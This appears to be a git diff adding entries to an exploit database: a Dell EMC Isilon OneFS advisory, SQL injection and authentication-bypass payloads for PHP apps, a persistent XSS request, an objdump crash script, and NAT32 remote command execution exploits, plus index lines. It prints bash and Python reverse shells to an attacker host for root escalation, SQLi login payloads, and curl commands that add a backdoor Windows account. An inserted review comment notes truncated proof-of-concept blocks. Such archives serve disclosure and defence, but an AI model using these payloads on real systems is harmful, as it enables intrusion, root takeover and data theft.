diff --git a/exploits/linux/webapps/44039.txt b/exploits/linux/webapps/44039.txt new file mode 100644 index 000000000..d85819bb7 --- /dev/null +++ b/exploits/linux/webapps/44039.txt 
@@ -0,0 +1,538 @@ +Core Security - Corelabs Advisory +http://corelabs.coresecurity.com/ +Dell EMC Isilon OneFS Multiple Vulnerabilities + +1. **Advisory Information** + +Title: Dell EMC Isilon OneFS Multiple Vulnerabilities +Advisory ID: CORE-2017-0009 +Advisory URL: +http://www.coresecurity.com/advisories/dell-emc-isilon-onefs-multiple-vulnerabilities +Date published: 2018-02-14 +Date of last update: 2018-02-14 +Vendors contacted: Dell EMC +Release mode: Coordinated release + +2. **Vulnerability Information** + +Class: Cross-Site Request Forgery [CWE-352], Improper Privilege +Management [CWE-269], Improper Privilege Management [CWE-269], Improper +Neutralization of Input During Web Page Generation [CWE-79], Improper +Neutralization of Input During Web Page Generation [CWE-79], Improper +Neutralization of Input During Web Page Generation [CWE-79], Improper +Neutralization of Input During Web Page Generation [CWE-79], Improper +Neutralization of Input During Web Page Generation [CWE-79], Improper +Neutralization of Input During Web Page Generation [CWE-79] +Impact: Code execution +Remotely Exploitable: Yes +Locally Exploitable: Yes +CVE Name: CVE-2018-1213, CVE-2018-1203, CVE-2018-1204, CVE-2018-1186, +CVE-2018-1187, CVE-2018-1188, CVE-2018-1189, CVE-2018-1201, +CVE-2018-1202 + +3. **Vulnerability Description** + +Dell EMC's website states that:[1] + +The EMC Isilon scale-out NAS storage platform combines modular hardware +with unified software to harness unstructured data. Powered by the OneFS +operating system, an EMC Isilon cluster delivers a scalable pool of +storage with a global namespace. 
+ +The platform's unified software provides centralized Web-based and +command-line administration to manage the following features: + +- A cluster that runs a distributed file system + +- Scale-out nodes that add capacity and performance + +- Storage options that manage files and tiering + +- Flexible data protection and high availability + +- Software modules that control costs and optimize resources + +Multiple vulnerabilities were found in the Isilon OneFS Web console that +would allow a remote attacker to gain command execution as root. + +4. **Vulnerable Packages** + +. Dell EMC Isilon OneFS version 8.1.1.0 (CVE-2018-1203, CVE-2018-1204) +. Dell EMC Isilon OneFS versions between 8.1.0.0 - 8.1.0.1 (all CVEs) +. Dell EMC Isilon OneFS versions between 8.0.1.0 - 8.0.1.2 (all CVEs) +. Dell EMC Isilon OneFS versions between 8.0.0.0 - 8.0.0.6 (all CVEs) +. Dell EMC Isilon OneFS versions 7.2.1.x (CVE-2018-1186, CVE-2018-1188, + CVE-2018-1201, CVE-2018-1204, CVE-2018-1213) +. Dell EMC Isilon OneFS version 7.1.1.11 (CVE-2018-1186, CVE-2018-1201, + CVE-2018-1202, CVE-2018-1204, CVE-2018-1213) + +Other products and versions might be affected, but they were not tested. + +5. **Vendor Information, Solutions and Workarounds** + +Dell EMC provided a link to the Download for Isilon OneFS page which +contains the patches: + +. https://support.emc.com/downloads/15209_Isilon-OneFS + +6. **Credits** + +These vulnerabilities were discovered and researched by Ivan Huertas and +Maximiliano Vidal from Core Security Consulting Services. The +publication of this advisory was coordinated by Alberto Solino from Core +Advisories Team. + +7. **Technical Description / Proof of Concept Code** + +The Web console contains several sensitive features that are vulnerable +to cross-site request forgery. We describe this issue in section 7.1. + +Sections 7.2 and 7.3 show two vectors to escalate privileges to root. 
+ +Various persistent cross-site scripting issues are presented in the +remaining sections (7.4, 7.5, 7.6, 7.7, 7.8, 7.9). + +7.1. **Cross-site request forgery leading to command execution** + +[CVE-2018-1213] +There are no anti-CSRF tokens in any forms on the Web interface. +This would allow an attacker to submit authenticated requests when an +authenticated user browses an attacker-controlled domain. + +The Web console contains a plethora of sensitive actions that can be +abused, such as adding new users with SSH access or re-mapping existing +storage directories to allow read-write-execute access to all users. + +All requests are JSON-encoded, which in some cases might hinder +exploitation of CSRF vulnerabilities. However, the application does not +verify the content-type set. This allows an attacker to exploit the CSRF +vulnerabilities by setting a text/plain content-type and sending the +request body as JSON_PAYLOAD=ignored. + +The following proof of concept creates a new user and assigns him a new +role with enough privileges to log in via SSH, configure identifies, +manage authentication providers, configure the cluster and run the +remote support tools. + +/----- + + +
+ +
+
+ +
+ + + +-----/ + +7.2. **Privilege escalation due to incorrect sudo permissions** + +[CVE-2018-1203] +The compadmin user can run the tcpdump binary with root privileges via +sudo. This allows for local privilege escalation, as tcpdump can be +instructed to run shell commands when rotating capture files. + +/----- +pepe-1$ id +uid=11(compadmin) gid=0(wheel) groups=0(wheel),1(daemon) +pepe-1$ cat /tmp/lala.sh +#!/bin/bash + +bash -i >& /dev/tcp/192.168.1.66/8888 0>&1 +-----/ + +Once the desired shell script is in place, the attacker can run tcpdump +as follows to trigger the execution: + +/----- +pepe-1$ sudo tcpdump -i em0 -G 1 -z /tmp/lala.sh -w dump +tcpdump: WARNING: unable to contact casperd +tcpdump: listening on em0, link-type EN10MB (Ethernet), capture size +65535 bytes +/tmp/lala.sh: connect: Connection refused +/tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused +/tmp/lala.sh: connect: Connection refused +/tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused +-----/ + +As can be seen below, the script runs with root privileges: + +/----- +$ nc -lvp 8888 +Listening on [0.0.0.0] (family 0, port 8888) +Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, +sport 57692) +bash: no job control in this shell +[root@pepe-1 /compadmin]# id +uid=0(root) gid=0(wheel) +groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) +-----/ + +7.3. **Privilege escalation via remote support scripts** + +[CVE-2018-1204] +From the documentation: + +"OneFS allows remote support through EMC Secure Remote Services (ESRS) +which monitors your EMC Isilon cluster, and with your permission, allows +remote access to Isilon Technical Support personnel to gather cluster +data and troubleshoot issues." + +"After you enable remote support through ESRS, Isilon Technical Support +personnel can request logs with scripts that gather EMC Isilon cluster +data and then upload the data. 
+The remote support scripts based on the Isilon isi_gather_info +log-gathering tool are located in the /ifs/data/Isilon_Support/ +directory on each node." + +"Additionally, isi_phone_home, a tool that focuses on cluster- and +node-specific data, is enabled once you enable ESRS. This tool is +pre-set to send information about your cluster to Isilon Technical +Support on a weekly basis. You can disable or enable isi_phone_home from + the OneFS command-line interface." + +As a cluster administrator or compadmin, it is possible to enable the +remote support functionality, hence enabling the isi_phone_home tool via +sudo. This tool is vulnerable to a path traversal when reading the +script file to run, which would enable an attacker to execute arbitrary +python code with root privileges. + +If remote support is not enabled, an attacker could perform the +following operations in order to enable it: + +/----- +pepe-1$ sudo isi network subnets create 1 ipv4 1 +pepe-1$ sudo isi network pools create 1.0 +pepe-1$ sudo isi remotesupport connectemc modify --enabled=yes +--primary-esrs-gateway=10.10.10.10 --use-smtp-failover=no +--gateway-access-pools=1.0 +-----/ + +The isi_phone_home tool is supposed to run scripts located in the +root-only writable directory /usr/local/isi_phone_home/script. +However, the provided script name is used to construct the file path +without sanitization, allowing an attacker to reference other locations. 
+ +/----- +def run_script(script_file_name): + script_path = CFG.get('SCRIPTDIR') + '/' + script_file_name + if os.path.isfile(script_path): + cmd = 'python ' + script_path + ' 2>&1 ' + command_thread = command.Command(cmd) + exit_code, output = +command_thread.run(int(CFG.get("SCRIPT_TIEMOUT"))) + if exit_code: + logging.error("Error: {0} running script: {1} +".format(str(exit_code), output)) + else: + logging.error("File: {0} list_file_name doesn't exist +".format(script_path)) +-----/ + +The final step would be to create a malicious python script on any +writable location and call it via the isi_phone_tool using sudo. +Keep in mind that the previous steps are not required if the system does +already have remote support enabled. + +/----- +pepe-1$ cat /tmp/lala.py +#!/usr/bin/env python + +import socket,subprocess,os +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +s.connect(("192.168.1.66",8888)) +os.dup2(s.fileno(),0) +os.dup2(s.fileno(),1) +os.dup2(s.fileno(),2) +p=subprocess.call(["/bin/sh","-i"]) + +pepe-1$ sudo /usr/bin/isi_phone_home --script-file +../../../../../tmp/lala.py +-----/ + +/----- +$ nc -lvp 8888 +Listening on [0.0.0.0] (family 0, port 8888) +Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, +sport 56807) +pepe-1# id +uid=0(root) gid=0(wheel) +groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) +-----/ + +7.4. *Persistent cross-site scripting in the cluster description* + +[CVE-2018-1186] +The description parameter of the /cluster/identity endpoint is +vulnerable to cross-site scripting. + +After the cluster's description is updated, the payload will be executed +every time the user opens the Web console. 
+ +/----- +PUT /platform/3/cluster/identity HTTP/1.1 +Host: 192.168.1.11:8080 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) +Gecko/20100101 Firefox/55.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Content-Type: application/json +X-Requested-With: XMLHttpRequest +Content-Length: 61 +Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; +Connection: close + +{"description":"my cluster"} +-----/ + +7.5. **Persistent cross-site scripting in the Network Configuration page** + +[CVE-2018-1187] +The description parameter of the /network/groupnets endpoint is +vulnerable to cross-site scripting. + +After the description is updated, the payload will be executed every +time the user opens the network configuration page. + +/----- +POST /platform/4/network/groupnets HTTP/1.1 +Host: 192.168.1.11:8080 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) +Gecko/20100101 Firefox/55.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Content-Type: application/json +Content-Length: 186 +Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; +Connection: close + +{"description":"lala","dns_cache_enabled":true,"dns_options":[],"dns_search":[],"dns_servers":[],"name":"pepito2","server_side_dns_search":false} +-----/ + +7.6. **Persistent cross-site scripting in the Authentication Providers +page** + +[CVE-2018-1188] +The realm parameter of the /auth/settings/krb5/realms endpoint is +vulnerable to cross-site scripting. + +After the realm is updated, the payload will be executed every time the +user opens the Kerberos tab of the Authentication Providers page. 
+ +/----- +POST /platform/1/auth/settings/krb5/realms HTTP/1.1 +Host: 192.168.1.11:8080 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) +Gecko/20100101 Firefox/55.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Content-Type: application/json +Content-Length: 78 +Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; +Connection: close + +{"is_default_realm":true,"kdc":[],"realm":"ASDASD","description":"pepito","enabled":true,"force_run":false,"impact":null,"paths":["/ifs"],"recursion_depth":-1,"schedule":null} +-----/ + +7.8. **Persistent cross-site scripting in the Job Operations page** + +[CVE-2018-1201] +The description parameter of the /job/policies endpoint is vulnerable to +cross-site scripting. + +After the description is updated, the payload will be executed every +time the user opens the Impact Policies section of the Job Operations +page. + +/----- +POST /platform/1/job/policies HTTP/1.1 +Host: 192.168.1.11:8080 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/json +X-Requested-With: XMLHttpRequest +Content-Length: 210 +Cookie: isisessid=8a5026c0-f045-4505-9d2b-ae83bc90f8ea; +Connection: close + +{"name":"my policy","description":"","intervals":[{"begin":"Sunday +00:00","end":"Sunday +00:00","impact":"Low"},{"impact":"Low","begin":"Sunday +01:03","end":"Monday 01:01"}]} +-----/ + +7.9. **Persistent cross-site scripting in the NDMP page** + +[CVE-2018-1202] +The name parameter of the /protocols/ndmp/users endpoint is vulnerable +to cross-site scripting. + +After the name is updated, the payload will be executed every time the +user opens the NDMP Settings section of the NDMP page. 
+ +/----- +POST /platform/3/protocols/ndmp/users HTTP/1.1 +Host: 192.168.1.11:8080 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) +Gecko/20100101 Firefox/55.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/json +X-Requested-With: XMLHttpRequest +Content-Length: 64 +Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; +Connection: close + +{"name":"","password":"123123"} +-----/ + +8. **Report Timeline** + +2017-09-25: Core Security sent an initial notification to Dell EMC, +including a draft advisory. +2017-09-26: Dell EMC confirmed reception and informed an initial +response would be ready by October 5th. +2017-10-05: Dell EMC confirmed problem exists for all vulnerabilities +reported except one, for which evaluation will be finalized soon. Dell +EMC stated that, for the confirmed issues, a remediation plan will be +provided by 10/16. +2017-10-05: Core Security thanked the follow up email. +2017-10-06: Dell EMC reported an update on one privilege escalation +vulnerability reported, stating that 'ISI_PRIV_AUTH, and ISI_PRIV_ROLE +both are equivalent to admin level access'. They said they will be +updating the documentation to make it clearer. +2017-10-11: Core Security thanked for the clarification and confirmed +that section will be removed from the final advisory. +2017-10-16: Dell EMC sent a schedule for fixing six of the reported +vulnerabilities, with specific dates for every product's version. +2017-10-16: Core Security thanked the information and said it will +analyze the proposals sent once all the data is available. +2017-10-19: Dell EMC sent a schedule for the remaining three reported +vulnerabilities, with specific dates for every product's version. +2017-10-31: Core Security on the schedule sent, stating that fixing the +vulnerabilities by June 2018 is unacceptable given current industry +standards. 
Requested a review of the timeline or a thorough explanation +that justifies such delay. +2017-11-01: Dell EMC answered back stating that after reviewing the +original schedule, they said they believe they could have fixes ready +for versions 8.0.x and 8.1.x by January 2018. Only caveat is the +vulnerability 7.1 that might be pushed past January, although they said +they think they could meet the January deadline. +2017-11-13: Core Security thanked Dell's review of the release dates and +agreed on the proposed schedule, stating Core Security would like to +publish a single advisory for all the vulnerabilities reported. +Also requested CVE IDs for +each of the issues. +2018-01-16: Core Security asked for a status update on the release date +for the fixes since there was no update from Dell EMC. +2018-01-17: Dell EMC answered back stating they are awaiting +confirmation from the product team about the exact dates of release. +They said they will get back to us by the end of this week. Dell EMC +also asked our GPG public key again. +2018-01-18: Core Security thanked for the update and sent the advisory's +public GPG key. +2018-01-19: Dell EMC stated they are currently working on drafting their +advisory and will send it back to us (including CVEs) once they have the +necessary approvals. +2018-01-23: Dell EMC asked for our updated draft advisory. +2018-01-23: Core Security sent the updated draft advisory to Dell EMC. +2018-01-25: Dell EMC notified that the team are targeting to have the +fix available by February 12th. Additionally, Dell will send its draft +advisory by January 31th. +2018-01-29: Core Security thanked for the update and proposed February +14th as publication date. +2018-01-31: Dell EMC informed Core Security that they agreed to release +on February 14th. They also provided CVE IDs for each vulnerability +reported. +2018-02-01: Dell EMC sent its draft advisory. +2018-02-14: Advisory CORE-2017-0009 published. + +9. 
**References** + +[1] +https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm + +10. **About CoreLabs** + +CoreLabs, the research center of Core Security, is charged with +anticipating the future needs and requirements for information security +technologies. +We conduct our research in several important areas of computer security +including system vulnerabilities, cyber attack planning and simulation, +source code auditing, and cryptography. Our results include problem +formalization, identification of vulnerabilities, novel solutions and +prototypes for new technologies. CoreLabs regularly publishes security +advisories, technical papers, project information and shared software +tools for public use at: http://corelabs.coresecurity.com. + +11. **About Core Security** + +Core Security provides companies with the security insight they need to +know who, how, and what is vulnerable in their organization. The +company's threat-aware, identity & access, network security, and +vulnerability management solutions provide actionable insight and +context needed to manage security risks across the enterprise. This +shared insight gives customers a comprehensive view of their security +posture to make better security remediation decisions. Better insight +allows organizations to prioritize their efforts to protect critical +assets, take action sooner to mitigate access risk, and react faster if +a breach does occur. + +Core Security is headquartered in the USA with offices and operations in +South America, Europe, Middle East and Asia. To learn more, contact Core +Security at (678) 304-4500 or info@coresecurity.com + + +12. **Disclaimer** + +The contents of this advisory are copyright (c) 2017 Core Security and +(c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution +Non-Commercial Share-Alike 3.0 (United States) License: +http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \ No newline at end of file 
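Review bot: the Isilon advisory in 44039.txt is internally inconsistent as imported. Section 7 introduces the persistent XSS findings as 7.4 through 7.9, but the numbering jumps from 7.6 to 7.8, and CVE-2018-1189 appears in the CVE list with no section describing it; the 2017-10-11 timeline entry records that one section was dropped after Dell EMC's clarification, so either the intro and CVE list should be adjusted to match or the gap explained. Several proofs of concept are also truncated: the 7.1 CSRF form between the `/-----` delimiters is empty, and in 7.4 the request declares `Content-Length: 61` while the visible body `{"description":"my cluster"}` is 28 bytes, so angle-bracket content was stripped on import. Suggest re-importing from the Advisory URL given in section 1 or marking the PoC sections as redacted so readers do not mistake the empty blocks for the original.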
diff --git a/exploits/php/webapps/44036.txt b/exploits/php/webapps/44036.txt new file mode 100644 index 000000000..5a3a86ebe --- /dev/null +++ b/exploits/php/webapps/44036.txt @@ -0,0 +1,18 @@ +# Exploit Title: Social Oauth Login PHP - Authentication Bypass +# Dork: N/A +# Date: 2018-02-12 +# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com +# Vendor Homepage: https://www.codester.com/items/4554/social-oauth-login-php +# Version: All version +# Category: Webapps +# CVE: N/A +# # # # # +# Description: +# With this exploit,attacker can bypass admin login authentication. +# # # # # +# Proof of Concept : + +http://localhost/PATH/adminLogin.php + +# Username : anything +# Password : ' or ''=' \ No newline at end of file diff --git a/exploits/php/webapps/44037.txt b/exploits/php/webapps/44037.txt new file mode 100644 index 000000000..67bf8fc21 --- /dev/null +++ b/exploits/php/webapps/44037.txt 
@@ -0,0 +1,36 @@ +# Exploit Title: SOA - School Management Software with Integrated +Parents/Students Portal & Mobile App - 'access_login' SQL Injection +# Dork: N/A +# Date: 2018-02-14 +# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com +# Vendor Homepage: +https://codecanyon.net/item/soa-school-management-software-with-integrated-parents-students-portal/20435367?s_rank=495 +# Version: All version +# Category: Webapps +# CVE: N/A +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands. +# # # # # +# Proof of Concept : + +SQLI : + +http://localhost/PATH/administrator/index.php + +# Parameter : access_login (POST) +# Type: Error based +# Title: MySQL >= 5.6.35 AND Error based - extractvalue,updatexml +(XPATH query) +# Payload 1: 1') and extractvalue(1,concat(0x3a,user(),0x3a,version()))# +# Payload 2: 1') and updatexml(1, concat(0x3a, version(),0x3a,user()),1)# +####################################### +# Discrption : The 'username' field is vulnerable in this script +('access_login' parameter).First inject payload into this parameter. +# then put anything in password and click login. You will have XPATH syntax +error in the next page that contains user and db_name . +# You can find all tables and any information from database by using XPATH +query .You can use extractvalue() or updatexml() for generating error . + +Username : 1') and extractvalue(1,concat(0x3a,user(),0x3a,version()))# +Password : anything \ No newline at end of file diff --git a/exploits/php/webapps/44038.txt b/exploits/php/webapps/44038.txt new file mode 100644 index 000000000..c475cb160 --- /dev/null +++ b/exploits/php/webapps/44038.txt 
@@ -0,0 +1,34 @@ +Application UserSpice PHP user management +Vulnerability userSpice <= 4.3 Persistent Cross Site Scripting +URL https://userspice.com +Date 2.13.2018 +Author Dolev Farhi + + +1. Login with a regular user +2. Navigate to Public profile +3. Edit your bio +4. Enter XSS payload +5. Once anyone visits the Bio page the payload will execute + +POST /users/edit_profile.php HTTP/1.1 +Host: 192.168.56.2 +Content-Length: 59 +Cache-Control: max-age=0 +Origin: http://192.168.56.2 +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Referer: http://192.168.56.2/users/edit_profile.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9,he;q=0.8 +Connection: close + +bio=&csrf=8b1339546d6af1e7536da0a705302e9c&update_bio= + +Vulnerable code: + +

id)?>

+

+ \ No newline at end of file diff --git a/exploits/windows/dos/44035.py b/exploits/windows/dos/44035.py new file mode 100755 index 000000000..605f5b48f --- /dev/null +++ b/exploits/windows/dos/44035.py @@ -0,0 +1,33 @@ +# Exploit Title: Objdump - Integer Overflow Crash POC +# Date: 12.02.2018 +# Exploit Author: r4xis +# Tested Version: 2.26.1 +# Vuln Version: <2.29.1 +# CVE: cve-2018-6323 +# Tested on: Ubuntu 16.04 32-bit +# Vulnerability Details: +# https://www.cvedetails.com/cve/CVE-2018-6323/ +# https://sourceware.org/bugzilla/show_bug.cgi?id=22746 + + +import os + +hello = "#include\nint main(){printf(\"HelloWorld!\\n\"); return 0;}" +f = open("helloWorld.c", 'w') +f.write(hello) +f.close() + +os.system("gcc -c helloWorld.c -o test") +# file test +# test: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped + +f = open("test", 'rb+') +f.read(0x2c) +f.write("\xff\xff") # 65535 +f.read(0x244-0x2c-2) +f.write("\x00\x00\x00\x20") # 536870912 +f.close() +# readelf -h test +# Number of program headers: 65535 (536870912) + +os.system("objdump -x test; rm -r helloWorld.c test") \ No newline at end of file diff --git a/exploits/windows/webapps/44033.txt b/exploits/windows/webapps/44033.txt new file mode 100644 index 000000000..d7e8551fc --- /dev/null +++ b/exploits/windows/webapps/44033.txt 
@@ -0,0 +1,141 @@ +[+] Credits: hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/NAT32-REMOTE-COMMAND-EXECUTION-CVE-2018-6940.txt +[+] ISR: Apparition Security + +[-_-] D1rty0tis + + +Vendor: +============= +www.nat32.com + + +Product: +================= +NAT32 Build (22284) + + +NAT32 is a versatile IP Router implemented as a WIN32 application. + + +Vulnerability Type: +=================== +Remote Command Execution + + +CVE Reference: +============== +CVE-2018-6940 + + +Security Issue: +================ +NAT32 listens on Port 8080 for its Web interface. + +C:\>netstat -ano | findstr 8080 + TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 3720 + + +If the 'Password Checking' (BASIC authentication) feature is NOT enabled (user must select it under config tab) then remote attackers who can reach +NAT32 can potentially execute arbitrary commands, if authentication is enabled they will get 'Unauthorized' server reply, however, read on ... + +e.g. + +Add user account. + +C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add" + + +
run start net user D1rty0Tis abc123 /add Done
+
+ + +If NAT32 'Password Checking' feature IS enabled, remote attackers can STILL potentially issue arbitrary commands exploiting a +Cross Site Scripting vulnerability in the HTTPD code of NAT32, if authenticated NAT32 users click a malicious link +or visit an attacker controlled webpage. + +Also worth mentioning, NAT32 implements BASIC authentication which pass BASE64 Encoded credentials which can be easily +revealed if sniffed on network. + +When 'Password Checking' is enabled attackers using Ajax calls via XSS would need to use a combination of '%0D%0A' and double encoding +to deal with 'white-space' in order for the payload to stay intact. + +%25 for '%' sign then 20 (%2520) = %20, using %20 or %2B will not cut it, however '%0D%0A' (CRLF) and '%2520' encoding serves us well. + +NAT32 has an interesting Command 'EXECR' that can allow attackers to capture Command output response from the server to see right away if an +attack was success or not. + +e.g. + +Add account and get response (EXECR) + +HTTP Response: + + +
The command completed successfully.
+
+execr net user D1rty0Tis abc123 /add Done
+
+ + +The NAT32 'winroute' Command will return host route information. + +XSS response + +e.g. + + + +
Destination    Mask              Nexthop      Metric IfIndex Type Proto Age
+0.0.0.0         0.0.0.0         192.168.1.2        10       b    4     3 21:41 [min:sec]
+127.0.0.0       255.0.0.0       127.0.0.1          306      1    3     3 22:04 [min:sec]
+127.0.0.1       255.255.255.255 127.0.0.1          306      1    3     3 22:04 [min:sec]
+127.255.255.255 255.255.255.255 127.0.0.1          306      1    3     3 22:04 [min:sec]
+
+ + +Exploit/POC: +============= +NET32 Password Checking not enabled... + +C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add" + + +NAT32 BASIC authentication enabled use XSS... + +Add backdoor account and capture CMD output using NAT32 'execr' shell command. +http://x.x.x.x:8080/shell?cmd= + +Get Windows Routes (info disclosure): +http://x.x.x.x:8080/shell?cmd=%3Cscript%3Evar%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27GET%27,%27http://x.x.x.x:8080/shell?cmd=winroute%27,true);xhr.send(null);%3C/script%3E + + + +Network Access: +=============== +Remote + + +Severity: +========= +High + + +Disclosure Timeline: +============================= +Vendor Notification: February 9, 2018 +Vendor acknowledgement: February 9, 2018 +Vendor "I've decided to remove the HTTPD code from Build 22284 of NAT32" : February 12, 2018 +www.nat32.com website reads "NAT32 Version 2.2 Build 22284 is temporarily unavailable." : February 13, 2018 +February 14, 2018 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). \ No newline at end of file diff --git a/exploits/windows/webapps/44034.txt b/exploits/windows/webapps/44034.txt new file mode 100644 index 000000000..494e3f93b 
--- /dev/null +++ b/exploits/windows/webapps/44034.txt 
@@ -0,0 +1,75 @@ +[+] Credits: hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/NAT32-REMOTE-COMMAND-EXECUTION-CSRF-CVE-2018-6941.txt +[+] ISR: Apparition Security + +[-_-] D1rty0tis + + +Vendor: +============= +www.nat32.com + + +Product: +=========== +NAT32 Build (22284) + +NAT32® is a versatile IP Router implemented as a WIN32 application. + + +Vulnerability Type: +=================== +Remote Command Execution (CSRF) + + +CVE Reference: +============== +CVE-2018-6941 + + +Security Issue: +================ +CSRF issue exists in the HTTPD component of NAT32 v2.2 Build 22284 devices that can be exploited for Remote Code Execution. + +Remote attackers can potentially execute arbitrary System Commands due to a Cross Site Request Forgery, if an authenticated NAT32 user clicks a malicious link +or visits an attacker controlled webpage as NAT32 performs no check for blind requests. + +Its also worth mentioning is NAT32 implements BASIC authentication which pass BASE64 Encoded credentials which can be easily revealed if sniffed on network. + + +Exploit/POC: +============= +Backdoor clicker + + + +Network Access: +=============== +Remote + + + +Severity: +========= +High + + + +Disclosure Timeline: +============================= +Vendor Notification: February 9, 2018 +Vendor acknowledgement: February 9, 2018 +Vendor "I've decided to remove the HTTPD code from Build 22284 of NAT32" : February 12, 2018 +www.nat32.com website reads "NAT32 Version 2.2 Build 22284 is temporarily unavailable." : February 13, 2018 +February 14, 2018 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 331a4335b..4b8353484 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5493,6 +5493,7 @@ id,file,description,date,author,type,platform,port 43996,exploits/android/dos/43996.txt,"Android - 'getpidcon' Permission Bypass in KeyStore Service",2018-02-07,"Google Security Research",dos,android, 43998,exploits/multiple/dos/43998.txt,"Multiple OEM - 'nsd' Remote Stack Format String (PoC)",2017-12-14,bashis,dos,multiple, 44007,exploits/macos/dos/44007.c,"macOS Kernel - Use-After-Free Due to Lack of Locking in 'AppleEmbeddedOSSupportHostClient::registerNotificationPort'",2018-02-09,"Google Security Research",dos,macos, +44035,exploits/windows/dos/44035.py,"GNU binutils 2.26.1 - Integer Overflow (POC)",2018-02-14,r4xis,dos,windows, 41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware, 41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows, 41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows, 
@@ -38037,6 +38038,12 @@ id,file,description,date,author,type,platform,port 44028,exploits/php/webapps/44028.txt,"TypeSetter CMS 5.1 - 'Host' Header Injection",2018-02-13,"Navina Asrani",webapps,php, 44029,exploits/php/webapps/44029.html,"TypeSetter CMS 5.1 - Cross-Site Request Forgery",2018-02-13,"Navina Asrani",webapps,php, 44030,exploits/php/webapps/44030.txt,"News Website Script 2.0.4 - 'search' SQL Injection",2018-02-13,"Varun Bagaria",webapps,php, +44033,exploits/windows/webapps/44033.txt,"NAT32 2.2 Build 22284 - Remote Command Execution",2018-02-14,hyp3rlinx,webapps,windows, +44034,exploits/windows/webapps/44034.txt,"NAT32 2.2 Build 22284 - Cross-Site Request Forgery",2018-02-14,hyp3rlinx,webapps,windows, +44036,exploits/php/webapps/44036.txt,"Social Oauth Login PHP - Authentication Bypass",2018-02-14,L0RD,webapps,php, +44037,exploits/php/webapps/44037.txt,"SOA School Management - 'access_login' SQL Injection",2018-02-14,L0RD,webapps,php, +44038,exploits/php/webapps/44038.txt,"userSpice 4.3 - Cross-Site Scripting",2018-02-14,"Dolev Farhi",webapps,php, +44039,exploits/linux/webapps/44039.txt,"Dell EMC Isilon OneFS - Multiple Vulnerabilities",2018-02-14,"Core Security",webapps,linux, 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 